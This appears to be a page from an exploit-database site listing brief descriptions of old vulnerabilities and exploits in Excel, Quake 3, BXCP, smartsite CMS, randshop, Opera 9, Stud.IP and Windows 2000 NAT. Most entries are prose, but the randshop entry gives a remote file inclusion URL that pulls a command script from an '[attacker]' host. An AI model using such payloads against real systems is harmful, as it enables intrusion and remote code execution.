Explore Vulnerabilities

Explore all Exploits:

excel hlink overflow UNIVERSAL poc by SYS 49152

This exploit is a universal proof-of-concept (PoC) for a buffer overflow vulnerability in Microsoft Excel. It works with any of the following operating systems and Office combinations: Windows 2000 SP4/XP SP1/XP SP2 and Office 2000/XP/2003. It creates a bindshell on port 49152.

Quake 3 Engine Client CG_ServerCommand() Remote Stack Overflow Exploit (Win32)

This exploit is a DLL that gets injected into the server exe. It is compiled with the Microsoft Detours library. It is a remote stack overflow exploit that uses a string which is heavily filtered before the overflow occurs. It is used to cause damage to the server exe.

BXCP exploit

This exploit is used to gain access to the user's password hash by exploiting a SQL injection vulnerability in the BXCP web application. The exploit takes the server, directory and user ID as arguments and then sends an HTTP request to the server with the malicious SQL query. The response contains the user's password hash which can then be used to gain access to the user's account.

smartsite cms v1.0 Multiple Remote File include

smartsite cms v1.0 is vulnerable to multiple remote file include vulnerabilities. The vulnerable code is present in comment.php, /admin/test.php, /admin/index.php and /admin/include/inc_adminfoot.php. The $root parameter is vulnerable to file inclusion. An attacker can exploit this vulnerability by sending a malicious URL to the vulnerable parameter.

Opera 9 DOS exploit

This exploit targets a Denial of Service (DoS) vulnerability in Opera 9. It was discovered by Ahmad Muammar W.K (y3dips[at]echo[dot]or[dot]id). The exploit uses an iframe with malicious JavaScript code to cause the browser to crash. The malicious code is triggered when the browser attempts to access the iframe's styleSheets property.

randshop <= 1.1.1 Remote File Inclusion Vulnerability

A Remote File Inclusion (RFI) vulnerability exists in randshop version 1.1.1 and earlier. An attacker can exploit this vulnerability by sending a maliciously crafted HTTP request to the vulnerable server, which can allow the attacker to execute arbitrary code on the server. The exploit code is http://[target]/[path]/includes/header.inc.php?dateiPfad=http://[attacker]/cmd.txt?&cmd=ls

Stud.IP Remote File Inclusion

Stud.IP is a learning and information management system for universities, educational facilities and enterprises. Stud.IP is vulnerable to a Remote File Inclusion vulnerability which allows an attacker to execute arbitrary PHP code by including files from local or external resources.

Windows TCP/IP source routing poc

A buffer overflow vulnerability exists in the Windows 2000 built-in NAT server when routing packets with the 'Loose Source and Record Route' option defined by RFC 791 through the server. This can cause a Denial of Service (DoS) condition, system hangs, or unstable operation. Code execution is potentially possible. Tested configuration: Windows 2000 English Standard/Advanced Service Pack 4 + Update Rollup 1 for Service Pack 4 with NAT server enabled. Windows 2003 is not affected.

Recent Exploits: